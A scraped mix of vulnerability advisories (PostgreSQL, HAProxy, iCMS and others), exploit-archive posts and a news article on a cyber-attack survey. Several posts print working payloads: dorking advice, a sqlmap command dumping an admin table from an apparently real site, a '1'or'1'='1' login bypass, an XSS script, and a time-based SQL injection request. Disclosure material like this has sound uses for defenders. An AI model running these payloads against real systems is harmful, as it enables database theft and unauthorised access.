SQL Injection vulnerability in oretnom23 School Faculty Scheduling System version 1.0, allows remote attacker to execute arbitrary code, escalate privilieges, and gain sensitive information via crafted payload to id parameter in manage_user.php.

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

CVE-2020-36034: GitHub - TCSWT/School-Faculty-Scheduling-System

IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.

**CVE-2023-39417****Extension script @substitutions@ within quoting allow SQL injection**

An extension script is vulnerable if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). No bundled extension is vulnerable. Vulnerable uses do appear in a documentation example and in non-bundled extensions. Hence, the attack prerequisite is an administrator having installed files of a vulnerable, trusted, non-bundled extension. Subject to that prerequisite, this enables an attacker having database-level CREATE privilege to execute arbitrary code as the bootstrap superuser. PostgreSQL will block this attack in the core server, so there's no need to modify individual extensions.

The PostgreSQL project thanks Micah Gate, Valerie Woolard, Tim Carey-Smith, and Christoph Berg for reporting this problem.

**Version Information**

Affected Version

Fixed In

Fix Published

15

15.4

2023-08-10

14

14.9

2023-08-10

13

13.12

2023-08-10

12

12.16

2023-08-10

11

11.21

2023-08-10

For more information about PostgreSQL versioning, please visit the versioning page.

**CVSS 3.0**

Overall Score

**7.5**

Component

core server

Vector

AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

**Reporting Security Vulnerabilities**

If you wish to report a new security vulnerability in PostgreSQL, please send an email to security@postgresql.org.

For reporting non-security bugs, please see the Report a Bug page.

CVE-2023-39417: Extension script @substitutions@ within quoting allow SQL injection

A vulnerability was found in PostgreSQL with the use of the MERGE command, which fails to test new rows against row security policies defined for UPDATE and SELECT. If UPDATE and SELECT policies forbid some rows that INSERT policies do not forbid, a user could store such rows.

CVE-2023-39418

FlatApp Premium Admin Dashboard version 1.0 suffers from a remote SQL injection vulnerability.

    ====================================================================================================================================| # Title     : FlatApp - Premium Admin Dashboard 1.0 SQL injection Vulnerability                                                  || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit)                                               | | # Vendor    : https://themeforest.net/item/flatapp-premium-admin-dashboard-template/4961564?ref=pixelcave                        |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : /business-detail.php?lid=15003 <===== inject here [+] D:\sqlmap>sqlmap.py -u https://wwmrigindiacom/business-detail.php?lid=15003 --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dump -D mrigindi_new1 -T admin_loginGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

FlatApp Premium Admin Dashboard 1.0 SQL Injection

Greeva version 2.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Greeva 2.0 Auth By Pass Vulnerability                                                                              || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 115.0.2(64-bit)                                            | | # Vendor    : https://coderthemes.com/greeva/index.html                                                                          |  ====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : user & pas = 1'or'1'='1[+] http://127.0.0.1/wsb-patho.com/sbpatho_system/pap_system/dist/auth-login.phpGreetings to :=================================================================jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R |===============================================================================

Greeva 2.0 SQL Injection

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

Posted Aug 11, 2023

Authored by indoushka

DigaSell Digital Store PHP Script version 1.0.0 suffers from a cross site scripting vulnerability.

tags | exploit, php, xss

SHA-256 | f72dfd55d23408ab5429974dee598db6c2f5f4c1ad279051decdd75964ab240b

Download | Favorite | View

**DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : DigaSell - Digital store PHP Script V1.0.0 XSS Vulnerability                                                       || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0(64-bit)                                               | | # Vendor    : https://codecanyon.net/item/digasell-digital-store-php-script/23580305?s_rank=2                                    |  | # Dork      : "Copyright  © DigaSell All Rights Reserved."                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /browse/tags/if<script>alert(/indoushka/);</script>=2                  [+] Panel       : https://127.0.0.1/codsemcom/digasell/browse/tags/if%3Cscript%3Ealert(/indoushka/);%3C/script%3E=2Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* shadow_00715 *9aylas*djroot.dz*LiquidWorm*Hussin-X*D4NB4R *ViRuS_Ra3cH *yasMouh* CraCkEr  |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,933)
*   Arbitrary (16,196)
*   BBS (2,859)
*   Bypass (1,740)
*   CGI (1,026)
*   Code Execution (7,277)
*   Conference (679)
*   Cracker (841)
*   CSRF (3,344)
*   DoS (23,416)
*   Encryption (2,370)
*   Exploit (51,861)
*   File Inclusion (4,221)
*   File Upload (973)
*   Firewall (821)
*   Info Disclosure (2,770)
*   Intrusion Detection (892)
*   Java (3,043)
*   JavaScript (858)
*   Kernel (6,671)
*   Local (14,448)
*   Magazine (586)
*   Overflow (12,691)
*   Perl (1,423)
*   PHP (5,145)
*   Proof of Concept (2,338)
*   Protocol (3,601)
*   Python (1,535)
*   Remote (30,765)
*   Root (3,581)
*   Rootkit (508)
*   Ruby (612)
*   Scanner (1,639)
*   Security Tool (7,886)
*   Shell (3,180)
*   Shellcode (1,214)
*   Sniffer (894)
*   Spoof (2,206)
*   SQL Injection (16,366)
*   TCP (2,406)
*   Trojan (687)
*   UDP (893)
*   Virus (664)
*   Vulnerability (31,770)
*   Web (9,663)
*   Whitepaper (3,749)
*   x86 (962)
*   XSS (17,932)
*   Other

**File Archives**

*   August 2023
*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (2,002)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,922)
*   Debian (6,812)
*   Fedora (1,692)
*   FreeBSD (1,244)
*   Gentoo (4,322)
*   HPUX (879)
*   iOS (351)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,428)
*   Mac OS X (686)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (485)
*   RedHat (13,711)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,808)
*   UNIX (9,289)
*   UnixWare (186)
*   Windows (6,573)
*   Other

DigaSell Digital Store PHP Script 1.0.0 Cross Site Scripting

By Waqas
The new study has identified a cybersecurity training gap and an alarming lack of preparedness in countering emerging threats.
This is a post from HackRead.com Read the original post: Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study

*   **Sector Vulnerabilities:** Indusface’s research reveals that the Education sector is the most susceptible to cyber attacks, with a staggering 78% of businesses in this domain having experienced such threats.

*   **Email Hacking Dominates:** Email hacking emerged as the most common form of cyber attack, affecting 64% of respondents across various industries, necessitating enhanced training and defences against phishing and related tactics.

*   **Financial Services Resilience:** In contrast, the Financial Services sector demonstrated stronger cyber resilience, with only 26% reporting cyber attacks, potentially due to robust cybersecurity investment and training.

*   **Training Deficits:** The study highlights a concerning lack of employee training in cyber security across various sectors, with 83% of Education sector businesses neglecting this crucial aspect.

*   **Expert Insights:** Venky Sundar, Indusface’s Founder and President, underscores the diverse methods cyber attackers employ and emphasizes the importance of proactive employee training, security assessments, and Web Application and API Protection (WAAP) solutions.

A study conducted by Indusface in July 2023 and recently shared with Hackread.com delved deep into the state of cybersecurity, unearthing insights into the sectors most targeted by cyber attacks and shedding light on the prevailing types of cyber assaults faced by enterprises. Here’s what the company found:

**The Perilous Terrain: A Sector-Wise Analysis**

Indusface embarked on an extensive investigation, surveying 2,200 respondents across 16 diverse industries, to unveil the contours of cyber attacks on businesses. The results showcased an alarming reality – nearly half (49%) of UK businesses had fallen victim to a cyber attack. Such statistics underscored the pressing need for robust cybersecurity strategies in the corporate world.

**Education: The Bullseye of Cyber Attacks**

Within this backdrop, the Education sector emerged as the most besieged by cyber threats, with a staggering 78% of businesses revealing that they had experienced an attack. This revelation demands attention, particularly when coupled with the fact that a significant 83% of organizations within the Education sector were found to lack proactive employee training in cybersecurity – a vulnerability that cybercriminals can exploit.

**Arts, Entertainment, and Recreation: Second in Line**

Coming in second place, the Arts, Entertainment, and Recreation sector encountered cyber attacks at a rate of 68%. Disturbingly, over 30% of businesses in this sector were not actively training their personnel in cybersecurity protocols. This lack of preparation exposes these businesses to a range of attacks, including the ever-pervasive threat of email hacking.

**The Email Hacking Conundrum**

Indeed, email hacking stood tall as the most prevalent form of cyber attack, affecting a significant 64% of respondents from various business domains. This emphasizes the necessity for bolstered training in email security, encompassing a comprehensive approach to thwart phishing attempts, account takeovers, and credential stuffing.

**Navigating the Dangers: Financial Services Bypassed**

Contrasting the widespread cyber attacks on various sectors, the Financial Services industry exhibited resilience, reporting a lower incidence rate of 26%. This positive outcome was possibly influenced by the sector’s commitment to cybersecurity investment and training. It is evident that proactive measures play a pivotal role in safeguarding businesses from cyber threats.

**Expert Insights: Securing the Future**

Venky Sundar, Founder and President of Indusface, elucidated the significance of cybersecurity investment across all sectors. He highlighted that while email hacking remains a prevalent threat, the methods used are diverse, ranging from phishing to sophisticated attacks like SQL injection vulnerabilities.

Sundar emphasized the importance of training employees against phishing attacks, coupled with the implementation of robust security assessments and Web Application and API Protection (WAAP) solutions.

**A Call to Action**

As cyber threats continue to evolve in sophistication and impact, businesses must heed the findings of this research. Implementing comprehensive cybersecurity strategies, investing in training programs, and staying updated with the latest security solutions are imperatives that transcend industry boundaries.

In conclusion, the Indusface study serves as a clarion call to businesses to fortify their cyber defences. The relentless march of technology necessitates a united front against cybercriminals. With the insights gained from this research, businesses can navigate the complex landscape of cyber threats with resilience and vigilance.

**RELATED ARTICLES**

1.  AI Flagged as “Chronic Risk” in UK Gov Risk Register 2023
2.  SSH Remains Most Targeted Service in Cado’s Threat Report
3.  Russian Dark Net Markets Dominate the Global Illicit Drug Trade
4.  Submarine Cables Face Escalating Cybersecurity Threats, Report
5.  US, India, China Most Targeted in DDoS Attacks, StormWall Report

I am a UK-based cybersecurity journalist with a passion for covering the latest happenings in cyber security and tech world. I am also into gaming, reading and investigative journalism

Email Hacking Reigns as Top Cybersecurity Threat, Indusface Study

HAProxy through 2.0.32, 2.1.x and 2.2.x through 2.2.30, 2.3.x and 2.4.x through 2.4.23, 2.5.x and 2.6.x before 2.6.15, 2.7.x before 2.7.10, and 2.8.x before 2.8.2 forwards empty Content-Length headers, violating RFC 9110 section 8.6. In uncommon cases, an HTTP/1 server behind HAProxy may interpret the payload as an extra request.

CVE-2023-40225

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the bakupdata function.

CVE-2023-39806

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability via the where parameter at admincp.php.

\[CVE-ID\]

CVE-2023-39805

\------------------------------------------

\[Description\]

iCMS v7.0.16 was discovered to contain a SQL injection vulnerability

via the where parameter at admincp.php.

\------------------------------------------

\[Vulnerability Type\]

SQL Injection

\------------------------------------------

\[Vendor of Product\]

icmsdev

\------------------------------------------

\[Affected Product Code Base\]

icms V7.0.16 - V7.0.16

\------------------------------------------

\[Affected Component\]

icms<=V7.0.16

\------------------------------------------

\[Attack Type\]

Remote

\------------------------------------------

\[Impact Information Disclosure\]

true

\------------------------------------------

\[Attack Vectors\]

POST /icms/admincp.php?app=database&do=query&frame=iPHP&CSRF\_TOKEN=fe334f6fgxSmDHDpZeekNtohnt-hBYXBAOJkd5xXq\_XXz5vaYOwEoS\_nJrEdZo26EJVC0fA0SkLpfBFFzcE4ly18oxAoBMoCTr22qJ8 HTTP/1.1

Cookie: iCMS\_ADMIN\_AUTH=23f0a4caAp2o-gYF7T1PFGTY0fdLZd43ZdGHuQY1NnyOjOUDHZxyC\_CewgaX5uR1iNHfEz\_Pj20qTaPC\_NZlv9CKoxpPtJ80fBz7nbiMensa6tkGlbYrpw; XDEBUG\_SESSION=11807

field=tkd&pattern=123123&replacement=1231321&where=where+id=1+AND+(SELECT+\*+FROM+(SELECT(SLEEP(10)))testsql)

\------------------------------------------

\[Has vendor confirmed or acknowledged the vulnerability?\]

true

\------------------------------------------

\[Discoverer\]

chubby

\------------------------------------------

\[Reference\]

http://icms.com

http://icmsdev.com

Tag

#sql